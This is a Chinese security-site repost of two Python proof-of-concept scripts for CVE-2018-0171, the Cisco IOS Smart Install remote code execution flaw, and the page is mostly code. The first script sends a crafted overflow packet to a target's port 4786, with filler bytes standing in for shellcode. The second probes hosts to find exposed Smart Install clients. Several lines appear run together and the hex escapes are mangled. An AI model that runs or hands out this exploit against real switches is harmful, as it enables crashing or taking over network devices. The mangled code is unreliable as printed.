微慑信息网

[CVE-2018-0171]Cisco IOS/IOS XE软件智能安装远程执行代码漏洞[POC]

拓展阅读(点评/知识):

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

POC1:

url:https://github.com/hacking-anything/research

# smi_ibc_init_discovery_BoF.py

import socket 
import struct 
from optparse import OptionParser 

# Parse the target options 
parser = OptionParser() 
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")  parser.add_option("-p", "--port", dest="port", 
type="int", help="Port of Client", default=4786)  (options, args) = parser.parse_args() 

def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'): 
    return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v 

def send_packet(sock, packet): 
    sock.send(packet)   

def receive(sock):  
    return sock.recv() 

if __name__ == "__main__": 

    print "[*] Connecting to Smart Install Client ", options.target, "port", options.port 

    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    con.connect((options.target, options.port)) 

    payload = 'BBBB' * 44  shellcode = 'D' * 2048 

    data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload 

    tlv_1 = craft_tlv(0x00000001, data)  tlv_2 = shellcode 

    hdr =  'x00x00x00x01'                                   # msg_from
    hdr += 'x00x00x00x01'                                   # version
    hdr += 'x00x00x00x07'                                   # msg_hdr_type
    hdr += struct.pack('>I', len(data))                         # data_length

    pkt = hdr + tlv_1 + tlv_2 

    print "[*] Send a malicious packet"  
    send_packet(con, pkt)

POC2:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Author: Michael Schueler <[email][email protected][/email]>
# Based on work by: Jaime Filson <[email][email protected][/email]>
# Date: 2017-03-17

import sys
import socket

halt = False

try:
    import argparse
except ImportError:
    print('Missing needed module: argparse')
    halt = True

if halt:
    sys.exit()


def setup():
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--ip', action='store', dest='ip', required=True, help='IP Address to check')
    parser.add_argument('-p', '--port', action='store', dest='port', type=int, default=4786, help='PORT to check')

    global args
    args = parser.parse_args()


def main():
    setup()

    CONN_TIMEOUT = 10

    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.settimeout(CONN_TIMEOUT)

    try:
        conn.connect((args.ip, args.port))
    except socket.gaierror:
        print('[ERROR] Could not resolve hostname. Exiting.')
        sys.exit()
    except socket.error:
        print('[ERROR] Could not connect to {0}:{1}'.format(args.ip, args.port))
        print('[INFO] Either Smart Install feature is Disabled, or Firewall is blocking port {0}'.format(args.port))
        print('[INFO] {0} is not affected'.format(args.ip))
        sys.exit()

    if conn:
        req = '0' * 7 + '1' + '0' * 7 + '1' + '0' * 7 + '4' + '0' * 7 + '8' + '0' * 7 + '1' + '0' * 8
        resp = '0' * 7 + '4' + '0' * 8 + '0' * 7 + '3' + '0' * 7 + '8' + '0' * 7 + '1' + '0' * 8

        print('[INFO] Sending TCP probe to {0}:{1}'.format(args.ip, args.port))

        conn.send(req.decode('hex'))

        while True:
            try:
                data = conn.recv(512)

                if (len(data) < 1):
                    print('[INFO] Smart Install Director feature active on {0}:{1}'.format(args.ip, args.port))
                    print('[INFO] {0} is not affected'.format(args.ip))
                    break
                elif (len(data) == 24):
                    if (data.encode('hex') == resp):
                        print('[INFO] Smart Install Client feature active on {0}:{1}'.format(args.ip, args.port))
                        print('[INFO] {0} is affected'.format(args.ip))
                        break
                    else:
                        print(
                        '[ERROR] Unexpected response received, Smart Install Client feature might be active on {0}:{1}'.format(
                            args.ip, args.port))
                        print('[INFO] Unclear whether {0} is affected or not'.format(args.ip))
                        break
                else:
                    print(
                    '[ERROR] Unexpected response received, Smart Install Client feature might be active on {0}:{1}'.format(
                        args.ip, args.port))
                    print('[INFO] Unclear whether {0} is affected or not'.format(args.ip))
                    break

            except socket.error:
                print('[ERROR] No response after {0} seconds (default connection timeout)'.format(CONN_TIMEOUT))
                print('[INFO] Unclear whether {0} is affected or not'.format(args.ip))
                break

            except KeyboardInterrupt:
                print('[ERROR] User ended script early with Control + C')
                break

        conn.close()


if __name__ == "__main__":
    main()

 

 

本文标题:[CVE-2018-0171]Cisco IOS/IOS XE软件智能安装远程执行代码漏洞[POC]
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2018/0407_6290.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » [CVE-2018-0171]Cisco IOS/IOS XE软件智能安装远程执行代码漏洞[POC]
分享到: 更多 (0)

评论 1

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  1. #1

    参考:https://embedi.com/blog/cisco-smart-install-remote-code-execution/

    微慑管理员6个月前 (04-10)回复

微慑信息网 专注工匠精神

访问我们联系我们